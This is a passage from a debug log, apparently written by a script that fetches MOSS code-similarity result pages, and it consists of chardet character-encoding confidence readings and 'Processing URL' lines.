0.01\nDEBUG:chardet.charsetprober:KOI8-R Russian confidence = 0.01\nDEBUG:chardet.charsetprober:ISO-8859-5 Russian confidence = 0.01\nDEBUG:chardet.charsetprober:MacCyrillic Russian confidence = 0.0\nDEBUG:chardet.charsetprober:IBM866 Russian confidence = 0.0\nDEBUG:chardet.charsetprober:IBM855 Russian confidence = 0.01\nDEBUG:chardet.charsetprober:ISO-8859-7 Greek confidence = 0.01\nDEBUG:chardet.charsetprober:windows-1253 Greek confidence = 0.01\nDEBUG:chardet.charsetprober:ISO-8859-5 Bulgairan confidence = 0.01\nDEBUG:chardet.charsetprober:windows-1251 Bulgarian confidence = 0.01\nDEBUG:chardet.charsetprober:TIS-620 Thai confidence = 0.01\nDEBUG:chardet.charsetprober:ISO-8859-9 Turkish confidence = 0.5426884855874641\nDEBUG:chardet.charsetprober:windows-1255 Hebrew confidence = 0.0\nDEBUG:chardet.charsetprober:windows-1255 Hebrew confidence = 0.0\nDEBUG:chardet.charsetprober:windows-1255 Hebrew confidence = 0.0\nDEBUG:chardet.charsetprober:utf-8 confidence = 0.7525\nDEBUG:chardet.charsetprober:EUC-JP not active\nDEBUG:chardet.charsetprober:SHIFT_JIS not active\nDEBUG:chardet.charsetprober:EUC-JP not active\nDEBUG:chardet.charsetprober:GB2312 not active\nDEBUG:chardet.charsetprober:EUC-KR not active\nDEBUG:chardet.charsetprober:CP949 not active\nDEBUG:chardet.charsetprober:GB2312 not active\nDEBUG:chardet.charsetprober:EUC-KR not active\nDEBUG:chardet.charsetprober:CP949 not active\nDEBUG:chardet.charsetprober:Big5 not active\nDEBUG:chardet.charsetprober:Big5 not active\nDEBUG:chardet.charsetprober:EUC-TW not active\nDEBUG:chardet.charsetprober:EUC-TW not active\nDEBUG:chardet.charsetprober:windows-1251 Russian confidence = 0.01\nDEBUG:chardet.charsetprober:KOI8-R Russian confidence = 0.01\nDEBUG:chardet.charsetprober:ISO-8859-5 Russian confidence = 0.01\nDEBUG:chardet.charsetprober:MacCyrillic Russian confidence = 0.0\nDEBUG:chardet.charsetprober:IBM866 Russian confidence = 0.0\nDEBUG:chardet.charsetprober:IBM855 Russian confidence = 0.01\nDEBUG:chardet.charsetprober:ISO-8859-7 Greek confidence = 0.01\nDEBUG:chardet.charsetprober:windows-1253 Greek confidence = 0.01\nDEBUG:chardet.charsetprober:ISO-8859-5 Bulgairan confidence = 0.01\nDEBUG:chardet.charsetprober:windows-1251 Bulgarian confidence = 0.01\nDEBUG:chardet.charsetprober:TIS-620 Thai confidence = 0.01\nDEBUG:chardet.charsetprober:ISO-8859-9 Turkish confidence = 0.5451217710292843\nDEBUG:chardet.charsetprober:windows-1255 Hebrew confidence = 0.0\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match232-top.html\nDEBUG:chardet.charsetprober:windows-1255 Hebrew confidence = 0.0\nDEBUG:chardet.charsetprober:windows-1255 Hebrew confidence = 0.0\nDEBUG:chardet.charsetprober:utf-8 confidence = 0.938125\nDEBUG:chardet.charsetprober:SHIFT_JIS not active\nDEBUG:chardet.charsetprober:EUC-JP not active\nDEBUG:chardet.charsetprober:GB2312 not active\nDEBUG:chardet.charsetprober:EUC-KR not active\nDEBUG:chardet.charsetprober:CP949 not active\nDEBUG:chardet.charsetprober:Big5 not active\nDEBUG:chardet.charsetprober:EUC-TW not active\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match232-0.html\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match232-1.html\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match233-top.html\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match233-0.html\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match233-1.html\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match234-top.html\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match234-0.html\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match234-1.html\nDEBUG:chardet.charsetprober:utf-8 confidence = 0.99\nDEBUG:chardet.charsetprober:SHIFT_JIS Japanese prober hit error at byte 19584\nDEBUG:chardet.charsetprober:SHIFT_JIS Japanese confidence = 0.01\nDEBUG:chardet.charsetprober:utf-8 confidence = 0.99\nDEBUG:chardet.charsetprober:EUC-JP Japanese confidence = 0.01\nDEBUG:chardet.charsetprober:GB2312 Chinese confidence = 0.01\nDEBUG:chardet.charsetprober:EUC-KR Korean confidence = 0.01\nDEBUG:chardet.charsetprober:CP949 Korean confidence = 0.01\nDEBUG:chardet.charsetprober:Big5 Chinese confidence = 0.01\nDEBUG:chardet.charsetprober:EUC-TW Taiwan confidence = 0.01\nDEBUG:chardet.charsetprober:windows-1251 Russian confidence = 0.01\nDEBUG:chardet.charsetprober:KOI8-R Russian confidence = 0.01\nDEBUG:chardet.charsetprober:ISO-8859-5 Russian confidence = 0.01\nDEBUG:chardet.charsetprober:MacCyrillic Russian confidence = 0.0\nDEBUG:chardet.charsetprober:SHIFT_JIS Japanese confidence = 0.01\nDEBUG:chardet.charsetprober:EUC-JP Japanese confidence = 0.01\nDEBUG:chardet.charsetprober:GB2312 Chinese confidence = 0.01\nDEBUG:chardet.charsetprober:EUC-KR Korean confidence = 0.01\nDEBUG:chardet.charsetprober:CP949 Korean confidence = 0.01\nDEBUG:chardet.charsetprober:Big5 Chinese confidence = 0.01\nDEBUG:chardet.charsetprober:EUC-TW Taiwan confidence = 0.01\nDEBUG:chardet.charsetprober:windows-1251 Russian confidence = 0.01\nDEBUG:chardet.charsetprober:KOI8-R Russian confidence = 0.01\nDEBUG:chardet.charsetprober:EUC-JP Japanese prober hit error at byte 19571\nDEBUG:chardet.charsetprober:IBM866 Russian confidence = 0.0\nDEBUG:chardet.charsetprober:IBM855 Russian confidence = 0.01\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match241-top.html\nDEBUG:chardet.charsetprober:ISO-8859-5 Russian confidence = 0.01\nDEBUG:chardet.charsetprober:MacCyrillic Russian confidence = 0.0\nDEBUG:chardet.charsetprober:IBM866 Russian confidence = 0.0\nDEBUG:chardet.charsetprober:ISO-8859-7 Greek confidence = 0.01\nDEBUG:chardet.charsetprober:windows-1253 Greek confidence = 0.01\nDEBUG:chardet.charsetprober:ISO-8859-5 Bulgairan confidence = 0.01\nDEBUG:chardet.charsetprober:windows-1251 Bulgarian confidence = 0.01\nDEBUG:chardet.charsetprober:TIS-620 Thai confidence = 0.01\nDEBUG:chardet.charsetprober:ISO-8859-9 Turkish confidence = 0.5667502331441078\nDEBUG:chardet.charsetprober:windows-1255 Hebrew confidence = 0.0\nDEBUG:chardet.charsetprober:windows-1255 Hebrew confidence = 0.0\nDEBUG:chardet.charsetprober:windows-1255 Hebrew confidence = 0.0\nDEBUG:chardet.charsetprober:utf-8 confidence = 0.99\nDEBUG:chardet.charsetprober:SHIFT_JIS Japanese confidence = 0.01\nDEBUG:chardet.charsetprober:EUC-JP Japanese confidence = 0.01\nDEBUG:chardet.charsetprober:GB2312 Chinese confidence = 0.01\nDEBUG:chardet.charsetprober:EUC-KR Korean confidence = 0.01\nDEBUG:chardet.charsetprober:IBM855 Russian confidence = 0.01\nDEBUG:chardet.charsetprober:ISO-8859-7 Greek confidence = 0.01\nDEBUG:chardet.charsetprober:windows-1253 Greek confidence = 0.01\nDEBUG:chardet.charsetprober:CP949 Korean confidence = 0.01\nDEBUG:chardet.charsetprober:Big5 Chinese confidence = 0.01\nDEBUG:chardet.charsetprober:EUC-TW Taiwan confidence = 0.01\nDEBUG:chardet.charsetprober:ISO-8859-5 Bulgairan confidence = 0.01\nDEBUG:chardet.charsetprober:windows-1251 Bulgarian confidence = 0.01\nDEBUG:chardet.charsetprober:TIS-620 Thai confidence = 0.01\nDEBUG:chardet.charsetprober:ISO-8859-9 Turkish confidence = 0.566879347621643\nDEBUG:chardet.charsetprober:windows-1255 Hebrew confidence = 0.0\nDEBUG:chardet.charsetprober:windows-1255 Hebrew confidence = 0.0\nDEBUG:chardet.charsetprober:GB2312 Chinese prober hit error at byte 19584\nDEBUG:chardet.charsetprober:windows-1255 Hebrew confidence = 0.0\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match241-0.html\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match241-1.html\nDEBUG:chardet.charsetprober:utf-8 confidence = 0.99\nDEBUG:chardet.charsetprober:EUC-KR Korean prober hit error at byte 19571\nDEBUG:chardet.charsetprober:SHIFT_JIS Japanese confidence = 0.01\nDEBUG:chardet.charsetprober:EUC-JP Japanese confidence = 0.01\nDEBUG:chardet.charsetprober:CP949 Korean prober hit error at byte 19571\nDEBUG:chardet.charsetprober:GB2312 Chinese confidence = 0.01\nDEBUG:chardet.charsetprober:EUC-KR Korean confidence = 0.01\nDEBUG:chardet.charsetprober:CP949 Korean confidence = 0.01\nDEBUG:chardet.charsetprober:Big5 Chinese confidence = 0.01\nDEBUG:chardet.charsetprober:EUC-TW Taiwan confidence = 0.01\nDEBUG:chardet.charsetprober:Big5 Chinese prober hit error at byte 19572\nDEBUG:chardet.charsetprober:EUC-TW Taiwan prober hit error at byte 19571\nDEBUG:chardet.charsetprober:utf-8 confidence = 0.7525\nDEBUG:chardet.charsetprober:SHIFT_JIS not active\nDEBUG:chardet.charsetprober:EUC-JP not active\nDEBUG:chardet.charsetprober:GB2312 not active\nDEBUG:chardet.charsetprober:EUC-KR not active\nDEBUG:chardet.charsetprober:CP949 not active\nDEBUG:chardet.charsetprober:Big5 not active\nDEBUG:chardet.charsetprober:EUC-TW not active\nDEBUG:chardet.charsetprober:windows-1251 Russian confidence = 0.01\nDEBUG:chardet.charsetprober:KOI8-R Russian confidence = 0.01\nDEBUG:chardet.charsetprober:ISO-8859-5 Russian confidence = 0.01\nDEBUG:chardet.charsetprober:MacCyrillic Russian confidence = 0.0\nDEBUG:chardet.charsetprober:IBM866 Russian confidence = 0.0\nDEBUG:chardet.charsetprober:IBM855 Russian confidence = 0.01\nDEBUG:chardet.charsetprober:ISO-8859-7 Greek confidence = 0.01\nDEBUG:chardet.charsetprober:windows-1253 Greek confidence = 0.01\nDEBUG:chardet.charsetprober:ISO-8859-5 Bulgairan confidence = 0.01\nDEBUG:chardet.charsetprober:windows-1251 Bulgarian confidence = 0.01\nDEBUG:chardet.charsetprober:TIS-620 Thai confidence = 0.01\nDEBUG:chardet.charsetprober:ISO-8859-9 Turkish confidence = 0.5297635729864526\nDEBUG:chardet.charsetprober:windows-1255 Hebrew confidence = 0.0\nDEBUG:chardet.charsetprober:windows-1255 Hebrew confidence = 0.0\nDEBUG:chardet.charsetprober:windows-1255 Hebrew confidence = 0.0\nDEBUG:chardet.charsetprober:utf-8 confidence = 0.7525\nDEBUG:chardet.charsetprober:SHIFT_JIS not active\nDEBUG:chardet.charsetprober:EUC-JP not active\nDEBUG:chardet.charsetprober:GB2312 not active\nDEBUG:chardet.charsetprober:EUC-KR not active\nDEBUG:chardet.charsetprober:CP949 not active\nDEBUG:chardet.charsetprober:Big5 not active\nDEBUG:chardet.charsetprober:EUC-TW not active\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match235-top.html\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match235-0.html\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match235-1.html\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match240-top.html\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match240-0.html\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match240-1.html\nDEBUG:chardet.charsetprober:utf-8 confidence = 0.9690625\nDEBUG:chardet.charsetprober:SHIFT_JIS Japanese confidence = 0.01\nDEBUG:chardet.charsetprober:EUC-JP Japanese confidence = 0.01\nDEBUG:chardet.charsetprober:GB2312 Chinese confidence = 0.01\nDEBUG:chardet.charsetprober:EUC-KR Korean confidence = 0.01\nDEBUG:chardet.charsetprober:CP949 Korean confidence = 0.01\nDEBUG:chardet.charsetprober:Big5 Chinese confidence = 0.01\nDEBUG:chardet.charsetprober:EUC-TW Taiwan confidence = 0.01\nDEBUG:chardet.charsetprober:windows-1251 Russian confidence = 0.01\nDEBUG:chardet.charsetprober:KOI8-R Russian confidence = 0.01\nDEBUG:chardet.charsetprober:ISO-8859-5 Russian confidence = 0.01\nDEBUG:chardet.charsetprober:MacCyrillic Russian confidence = 0.0\nDEBUG:chardet.charsetprober:IBM866 Russian confidence = 0.0\nDEBUG:chardet.charsetprober:IBM855 Russian confidence = 0.01\nDEBUG:chardet.charsetprober:ISO-8859-7 Greek confidence = 0.01\nDEBUG:chardet.charsetprober:windows-1253 Greek confidence = 0.01\nDEBUG:chardet.charsetprober:ISO-8859-5 Bulgairan confidence = 0.01\nDEBUG:chardet.charsetprober:windows-1251 Bulgarian confidence = 0.01\nDEBUG:chardet.charsetprober:TIS-620 Thai confidence = 0.01\nDEBUG:chardet.charsetprober:ISO-8859-9 Turkish confidence = 0.5451317928881247\nDEBUG:chardet.charsetprober:windows-1255 Hebrew confidence = 0.0\nDEBUG:chardet.charsetprober:windows-1255 Hebrew confidence = 0.0\nDEBUG:chardet.charsetprober:windows-1255 Hebrew confidence = 0.0\nDEBUG:chardet.charsetprober:utf-8 confidence = 0.9690625\nDEBUG:chardet.charsetprober:SHIFT_JIS Japanese confidence = 0.01\nDEBUG:chardet.charsetprober:EUC-JP Japanese confidence = 0.01\nDEBUG:chardet.charsetprober:GB2312 Chinese confidence = 0.01\nDEBUG:chardet.charsetprober:EUC-KR Korean confidence = 0.01\nDEBUG:chardet.charsetprober:CP949 Korean confidence = 0.01\nDEBUG:chardet.charsetprober:Big5 Chinese confidence = 0.01\nDEBUG:chardet.charsetprober:EUC-TW Taiwan confidence = 0.01\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match236-top.html\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match236-1.html\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match236-0.html\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match239-top.html\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match239-0.html\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match239-1.html\nDEBUG:chardet.charsetprober:SHIFT_JIS Japanese prober hit error at byte 21289\nDEBUG:chardet.charsetprober:EUC-JP Japanese prober hit error at byte 21276\nDEBUG:chardet.charsetprober:utf-8 confidence = 0.99\nDEBUG:chardet.charsetprober:GB2312 Chinese prober hit error at byte 21289\nDEBUG:chardet.charsetprober:SHIFT_JIS Japanese confidence = 0.01\nDEBUG:chardet.charsetprober:EUC-JP Japanese confidence = 0.01\nDEBUG:chardet.charsetprober:GB2312 Chinese confidence = 0.01\nDEBUG:chardet.charsetprober:EUC-KR Korean confidence = 0.01\nDEBUG:chardet.charsetprober:CP949 Korean confidence = 0.01\nDEBUG:chardet.charsetprober:EUC-KR Korean prober hit error at byte 21276\nDEBUG:chardet.charsetprober:utf-8 confidence = 0.99\nDEBUG:chardet.charsetprober:SHIFT_JIS Japanese confidence = 0.01\nDEBUG:chardet.charsetprober:EUC-JP Japanese confidence = 0.01\nDEBUG:chardet.charsetprober:GB2312 Chinese confidence = 0.01\nDEBUG:chardet.charsetprober:EUC-KR Korean confidence = 0.01\nDEBUG:chardet.charsetprober:CP949 Korean confidence = 0.01\nDEBUG:chardet.charsetprober:Big5 Chinese confidence = 0.01\nDEBUG:chardet.charsetprober:EUC-TW Taiwan confidence = 0.01\nDEBUG:chardet.charsetprober:windows-1251 Russian confidence = 0.01\nDEBUG:chardet.charsetprober:KOI8-R Russian confidence = 0.01\nDEBUG:chardet.charsetprober:ISO-8859-5 Russian confidence = 0.01\nDEBUG:chardet.charsetprober:MacCyrillic Russian confidence = 0.0\nDEBUG:chardet.charsetprober:IBM866 Russian confidence = 0.0\nDEBUG:chardet.charsetprober:IBM855 Russian confidence = 0.01\nDEBUG:chardet.charsetprober:ISO-8859-7 Greek confidence = 0.0\nDEBUG:chardet.charsetprober:windows-1253 Greek confidence = 0.0\nDEBUG:chardet.charsetprober:ISO-8859-5 Bulgairan confidence = 0.01\nDEBUG:chardet.charsetprober:windows-1251 Bulgarian confidence = 0.01\nDEBUG:chardet.charsetprober:TIS-620 Thai confidence = 0.01\nDEBUG:chardet.charsetprober:ISO-8859-9 Turkish confidence = 0.5440199921919715\nDEBUG:chardet.charsetprober:windows-1255 Hebrew confidence = 0.0\nDEBUG:chardet.charsetprober:CP949 Korean prober hit error at byte 21276\nDEBUG:chardet.charsetprober:Big5 Chinese confidence = 0.01\nDEBUG:chardet.charsetprober:SHIFT_JIS Japanese prober hit error at byte 17079\nDEBUG:chardet.charsetprober:windows-1255 Hebrew confidence = 0.0\nDEBUG:chardet.charsetprober:EUC-TW Taiwan confidence = 0.01\nDEBUG:chardet.charsetprober:Big5 Chinese prober hit error at byte 21277\nDEBUG:chardet.charsetprober:windows-1255 Hebrew confidence = 0.0\nDEBUG:chardet.charsetprober:windows-1251 Russian confidence = 0.01\nDEBUG:chardet.charsetprober:KOI8-R Russian confidence = 0.01\nDEBUG:chardet.charsetprober:ISO-8859-5 Russian confidence = 0.01\nDEBUG:chardet.charsetprober:MacCyrillic Russian confidence = 0.0\nDEBUG:chardet.charsetprober:IBM866 Russian confidence = 0.0\nDEBUG:chardet.charsetprober:IBM855 Russian confidence = 0.01\nDEBUG:chardet.charsetprober:ISO-8859-7 Greek confidence = 0.01\nDEBUG:chardet.charsetprober:windows-1253 Greek confidence = 0.01\nDEBUG:chardet.charsetprober:ISO-8859-5 Bulgairan confidence = 0.01\nDEBUG:chardet.charsetprober:windows-1251 Bulgarian confidence = 0.01\nDEBUG:chardet.charsetprober:TIS-620 Thai confidence = 0.01\nDEBUG:chardet.charsetprober:ISO-8859-9 Turkish confidence = 0.5353132766624097\nDEBUG:chardet.charsetprober:windows-1255 Hebrew confidence = 0.0\nDEBUG:chardet.charsetprober:EUC-JP Japanese prober hit error at byte 17066\nDEBUG:chardet.charsetprober:EUC-TW Taiwan prober hit error at byte 21276\nDEBUG:chardet.charsetprober:utf-8 confidence = 0.99\nDEBUG:chardet.charsetprober:windows-1255 Hebrew confidence = 0.0\nDEBUG:chardet.charsetprober:GB2312 Chinese prober hit error at byte 17079\nDEBUG:chardet.charsetprober:SHIFT_JIS Japanese confidence = 0.01\nDEBUG:chardet.charsetprober:EUC-JP Japanese confidence = 0.01\nDEBUG:chardet.charsetprober:windows-1255 Hebrew confidence = 0.0\nDEBUG:chardet.charsetprober:utf-8 confidence = 0.7525\nDEBUG:chardet.charsetprober:GB2312 Chinese confidence = 0.01\nDEBUG:chardet.charsetprober:EUC-KR Korean confidence = 0.01\nDEBUG:chardet.charsetprober:CP949 Korean confidence = 0.01\nDEBUG:chardet.charsetprober:Big5 Chinese confidence = 0.01\nDEBUG:chardet.charsetprober:EUC-TW Taiwan confidence = 0.01\nDEBUG:chardet.charsetprober:utf-8 confidence = 0.99\nDEBUG:chardet.charsetprober:SHIFT_JIS Japanese confidence = 0.01\nDEBUG:chardet.charsetprober:EUC-JP Japanese confidence = 0.01\nDEBUG:chardet.charsetprober:GB2312 Chinese confidence = 0.01\nDEBUG:chardet.charsetprober:EUC-KR Korean confidence = 0.01\nDEBUG:chardet.charsetprober:CP949 Korean confidence = 0.01\nDEBUG:chardet.charsetprober:Big5 Chinese confidence = 0.01\nDEBUG:chardet.charsetprober:EUC-TW Taiwan confidence = 0.01\nDEBUG:chardet.charsetprober:EUC-KR Korean prober hit error at byte 17066\nDEBUG:chardet.charsetprober:SHIFT_JIS not active\nDEBUG:chardet.charsetprober:EUC-JP not active\nDEBUG:chardet.charsetprober:GB2312 not active\nDEBUG:chardet.charsetprober:EUC-KR not active\nDEBUG:chardet.charsetprober:CP949 not active\nDEBUG:chardet.charsetprober:Big5 not active\nDEBUG:chardet.charsetprober:EUC-TW not active\nDEBUG:chardet.charsetprober:windows-1251 Russian confidence = 0.01\nDEBUG:chardet.charsetprober:KOI8-R Russian confidence = 0.01\nDEBUG:chardet.charsetprober:ISO-8859-5 Russian confidence = 0.01\nDEBUG:chardet.charsetprober:MacCyrillic Russian confidence = 0.0\nDEBUG:chardet.charsetprober:IBM866 Russian confidence = 0.0\nDEBUG:chardet.charsetprober:IBM855 Russian confidence = 0.01\nDEBUG:chardet.charsetprober:ISO-8859-7 Greek confidence = 0.01\nDEBUG:chardet.charsetprober:windows-1253 Greek confidence = 0.01\nDEBUG:chardet.charsetprober:ISO-8859-5 Bulgairan confidence = 0.01\nDEBUG:chardet.charsetprober:windows-1251 Bulgarian confidence = 0.01\nDEBUG:chardet.charsetprober:TIS-620 Thai confidence = 0.01\nDEBUG:chardet.charsetprober:ISO-8859-9 Turkish confidence = 0.5356196010713635\nDEBUG:chardet.charsetprober:windows-1255 Hebrew confidence = 0.0\nDEBUG:chardet.charsetprober:windows-1255 Hebrew confidence = 0.0\nDEBUG:chardet.charsetprober:windows-1255 Hebrew confidence = 0.0\nDEBUG:chardet.charsetprober:utf-8 confidence = 0.7525\nDEBUG:chardet.charsetprober:SHIFT_JIS not active\nDEBUG:chardet.charsetprober:EUC-JP not active\nDEBUG:chardet.charsetprober:GB2312 not active\nDEBUG:chardet.charsetprober:EUC-KR not active\nDEBUG:chardet.charsetprober:CP949 Korean prober hit error at byte 17066\nDEBUG:chardet.charsetprober:SHIFT_JIS Japanese prober hit error at byte 31464\nDEBUG:chardet.charsetprober:CP949 not active\nDEBUG:chardet.charsetprober:Big5 not active\nDEBUG:chardet.charsetprober:EUC-TW not active\nDEBUG:chardet.charsetprober:Big5 Chinese prober hit error at byte 17067\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match242-top.html\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match242-0.html\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match242-1.html\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match237-top.html\nDEBUG:chardet.charsetprober:EUC-TW Taiwan prober hit error at byte 17066\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match237-0.html\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match237-1.html\nDEBUG:chardet.charsetprober:utf-8 confidence = 0.7525\nDEBUG:chardet.charsetprober:SHIFT_JIS not active\nDEBUG:chardet.charsetprober:EUC-JP not active\nDEBUG:chardet.charsetprober:GB2312 not active\nDEBUG:chardet.charsetprober:EUC-KR not active\nDEBUG:chardet.charsetprober:CP949 not active\nDEBUG:chardet.charsetprober:Big5 not active\nDEBUG:chardet.charsetprober:EUC-TW not active\nDEBUG:chardet.charsetprober:windows-1251 Russian confidence = 0.01\nDEBUG:chardet.charsetprober:KOI8-R Russian confidence = 0.01\nDEBUG:chardet.charsetprober:ISO-8859-5 Russian confidence = 0.01\nDEBUG:chardet.charsetprober:MacCyrillic Russian confidence = 0.0\nDEBUG:chardet.charsetprober:IBM866 Russian confidence = 0.0\nDEBUG:chardet.charsetprober:IBM855 Russian confidence = 0.01\nDEBUG:chardet.charsetprober:ISO-8859-7 Greek confidence = 0.01\nDEBUG:chardet.charsetprober:windows-1253 Greek confidence = 0.01\nDEBUG:chardet.charsetprober:ISO-8859-5 Bulgairan confidence = 0.01\nDEBUG:chardet.charsetprober:windows-1251 Bulgarian confidence = 0.01\nDEBUG:chardet.charsetprober:TIS-620 Thai confidence = 0.01\nDEBUG:chardet.charsetprober:ISO-8859-9 Turkish confidence = 0.5288345786816061\nDEBUG:chardet.charsetprober:windows-1255 Hebrew confidence = 0.0\nDEBUG:chardet.charsetprober:windows-1255 Hebrew confidence = 0.0\nDEBUG:chardet.charsetprober:windows-1255 Hebrew confidence = 0.0\nDEBUG:chardet.charsetprober:utf-8 confidence = 0.7525\nDEBUG:chardet.charsetprober:SHIFT_JIS not active\nDEBUG:chardet.charsetprober:EUC-JP not active\nDEBUG:chardet.charsetprober:GB2312 not active\nDEBUG:chardet.charsetprober:EUC-KR not active\nDEBUG:chardet.charsetprober:CP949 not active\nDEBUG:chardet.charsetprober:Big5 not active\nDEBUG:chardet.charsetprober:EUC-TW not active\nDEBUG:chardet.charsetprober:EUC-JP Japanese prober hit error at byte 31451\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match238-top.html\nDEBUG:chardet.charsetprober:GB2312 Chinese prober hit error at byte 31464\nDEBUG:chardet.charsetprober:SHIFT_JIS Japanese prober hit error at byte 21300\nDEBUG:chardet.charsetprober:EUC-KR Korean prober hit error at byte 31451\nDEBUG:chardet.charsetprober:EUC-JP Japanese prober hit error at byte 21287\nDEBUG:chardet.charsetprober:CP949 Korean prober hit error at byte 31451\nDEBUG:chardet.charsetprober:GB2312 Chinese prober hit error at byte 21300\nDEBUG:chardet.charsetprober:Big5 Chinese prober hit error at byte 31452\nDEBUG:chardet.charsetprober:EUC-KR Korean prober hit error at byte 21287\nDEBUG:chardet.charsetprober:CP949 Korean prober hit error at byte 21287\nDEBUG:chardet.charsetprober:EUC-TW Taiwan prober hit error at byte 31451\nDEBUG:chardet.charsetprober:Big5 Chinese prober hit error at byte 21288\nDEBUG:chardet.charsetprober:EUC-TW Taiwan prober hit error at byte 21287\nDEBUG:chardet.charsetprober:utf-8 confidence = 0.938125\nDEBUG:chardet.charsetprober:utf-8 confidence = 0.7525\nDEBUG:chardet.charsetprober:SHIFT_JIS not active\nDEBUG:chardet.charsetprober:SHIFT_JIS not active\nDEBUG:chardet.charsetprober:EUC-JP not active\nDEBUG:chardet.charsetprober:GB2312 not active\nDEBUG:chardet.charsetprober:EUC-KR not active\nDEBUG:chardet.charsetprober:CP949 not active\nDEBUG:chardet.charsetprober:Big5 not active\nDEBUG:chardet.charsetprober:EUC-TW not active\nDEBUG:chardet.charsetprober:windows-1251 Russian confidence = 0.01\nDEBUG:chardet.charsetprober:KOI8-R Russian confidence = 0.01\nDEBUG:chardet.charsetprober:ISO-8859-5 Russian confidence = 0.01\nDEBUG:chardet.charsetprober:MacCyrillic Russian confidence = 0.0\nDEBUG:chardet.charsetprober:IBM866 Russian confidence = 0.0\nDEBUG:chardet.charsetprober:IBM855 Russian confidence = 0.01\nDEBUG:chardet.charsetprober:ISO-8859-7 Greek confidence = 0.01\nDEBUG:chardet.charsetprober:windows-1253 Greek confidence = 0.01\nDEBUG:chardet.charsetprober:ISO-8859-5 Bulgairan confidence = 0.01\nDEBUG:chardet.charsetprober:windows-1251 Bulgarian confidence = 0.01\nDEBUG:chardet.charsetprober:TIS-620 Thai confidence = 0.01\nDEBUG:chardet.charsetprober:ISO-8859-9 Turkish confidence = 0.5279702192042453\nDEBUG:chardet.charsetprober:windows-1255 Hebrew confidence = 0.0\nDEBUG:chardet.charsetprober:windows-1255 Hebrew confidence = 0.0\nDEBUG:chardet.charsetprober:windows-1255 Hebrew confidence = 0.0\nDEBUG:chardet.charsetprober:utf-8 confidence = 0.938125\nDEBUG:chardet.charsetprober:SHIFT_JIS not active\nDEBUG:chardet.charsetprober:EUC-JP not active\nDEBUG:chardet.charsetprober:GB2312 not active\nDEBUG:chardet.charsetprober:EUC-KR not active\nDEBUG:chardet.charsetprober:CP949 not active\nDEBUG:chardet.charsetprober:Big5 not active\nDEBUG:chardet.charsetprober:EUC-TW not active\nDEBUG:chardet.charsetprober:EUC-JP not active\nDEBUG:chardet.charsetprober:GB2312 not active\nDEBUG:chardet.charsetprober:EUC-KR not active\nDEBUG:chardet.charsetprober:CP949 not active\nDEBUG:chardet.charsetprober:Big5 not active\nDEBUG:chardet.charsetprober:EUC-TW not active\nDEBUG:chardet.charsetprober:windows-1251 Russian confidence = 0.01\nDEBUG:chardet.charsetprober:KOI8-R Russian confidence = 0.01\nDEBUG:chardet.charsetprober:ISO-8859-5 Russian confidence = 0.01\nDEBUG:chardet.charsetprober:MacCyrillic Russian confidence = 0.0\nDEBUG:chardet.charsetprober:IBM866 Russian confidence = 0.0\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match238-0.html\nDEBUG:chardet.charsetprober:IBM855 Russian confidence = 0.01\nDEBUG:chardet.charsetprober:ISO-8859-7 Greek confidence = 0.01\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match244-top.html\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match238-1.html\nDEBUG:chardet.charsetprober:windows-1253 Greek confidence = 0.01\nDEBUG:chardet.charsetprober:ISO-8859-5 Bulgairan confidence = 0.01\nDEBUG:chardet.charsetprober:windows-1251 Bulgarian confidence = 0.01\nDEBUG:chardet.charsetprober:TIS-620 Thai confidence = 0.01\nDEBUG:chardet.charsetprober:ISO-8859-9 Turkish confidence = 0.5354219195765306\nDEBUG:chardet.charsetprober:windows-1255 Hebrew confidence = 0.0\nDEBUG:chardet.charsetprober:windows-1255 Hebrew confidence = 0.0\nDEBUG:chardet.charsetprober:windows-1255 Hebrew confidence = 0.0\nDEBUG:chardet.charsetprober:utf-8 confidence = 0.7525\nDEBUG:chardet.charsetprober:SHIFT_JIS not active\nDEBUG:chardet.charsetprober:EUC-JP not active\nDEBUG:chardet.charsetprober:GB2312 not active\nDEBUG:chardet.charsetprober:EUC-KR not active\nDEBUG:chardet.charsetprober:CP949 not active\nDEBUG:chardet.charsetprober:Big5 not active\nDEBUG:chardet.charsetprober:EUC-TW not active\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match244-0.html\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match244-1.html\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match243-top.html\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match243-0.html\nDEBUG:root:Processing 